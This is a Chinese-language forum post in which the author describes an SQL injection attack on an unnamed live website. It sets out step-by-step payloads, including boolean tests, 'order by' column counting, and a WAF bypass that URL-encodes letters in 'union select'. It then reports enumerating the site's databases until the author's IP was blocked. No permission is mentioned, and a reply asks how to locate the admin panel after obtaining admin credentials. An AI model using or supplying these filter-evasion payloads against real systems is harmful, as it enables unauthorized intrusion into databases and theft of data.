首页 > 编程源码 > 某网站的sql注入绕过的小手法

某网站的sql注入绕过的小手法

楼主:Mucn''沐晨 [1级] · 2020-3-18 ·  浏览828 · 编程源码 · ID:

mucn又来分享了 这网站早就记在我的小本子里了

刚刚测试了一下 发现存在注入。 但存在拦截。

然后我在这儿给大家分享一个小绕过方法。

因为刚刚电脑因为多次访问ip被拦截了(如图一) 然后手机搞非常不方便 所以我这里就只分享下怎么绕过哦。

说下前面的几步小操作

and 1=1 (页面正常不拦截)

and 1=2 (页面不正常不拦截)

order by 2 (字段为2 不拦截)

and 1=2 union select 1,2 (拦截)

and 1=2 union (拦截)-这里就判断出waf对union是存在过滤的

and 1=2 select (拦截)-同上 waf对select也存在拦截

然后思考绕过 首先改大小写

and 1=2 UnioN sEleCT (拦截)

接着思考其他绕过手法(对字母U和S进行编码)

and 1=2 %55nion %53elect 1,2 (不拦截 页面爆出字段)如图二

接着通过爆出字段进行一些信息查询 如图三

然后爆库 如图4(就两个库 一个内置库 一个当前使用库)这里要是爆表的话肯定是选择当前使用库进行查表(可惜还没爆表就ip就被拦了 后续等我ip不被拦的时候再考虑要不要继续更下去吧 )image.pngimage.png

- 版权声明 - 1、本帖所有言论和图片等纯属网友个人意见,与流星社区立场无关;
2、其他单位或个人使用、转载或引用本帖时必须同时征得该帖子作者Mucn''沐晨流星社区的同意;
3、备注原文地址:https://bbs.liuxingw.com/t/24969.html,可忽略第2条;
4、帖子作者需承担一切因本文发表而直接或间接导致的相关责任;
5、如本帖内容或部分内容转载自其它媒体,这并不代表本站赞同其观点和对其真实性负责;
6、如本帖若为资源类,将仅限用于学习和研究目的,您必须在下载后的24个小时之内,从您安装或使用的设备中彻底删除上述内容;
7、如果您喜欢该程序,请支持正版软件,购买注册,可以得到更好的正版服务;
8、如本帖侵犯到任何版权或违法问题,请立即邮件告知我们,我们将及时予以处理。
3条回复 |  最后回复于2020-3-18

神速毫无 [1级]

发布于2020-3-18

回复列表

  • 内容加载中...

说点什么...

[]

获得了后台账号密码,怎么找后台呀
发布于2020-3-18

回复列表

  • 内容加载中...

说点什么...

瞑望 [3级]

围观
发布于2020-3-18

回复列表

  • 内容加载中...

说点什么...
登录注册 后才可进行评论
签到
9人签到
已签0天
  • 46611帖子
  • 1936538热点量
  • 184840火热值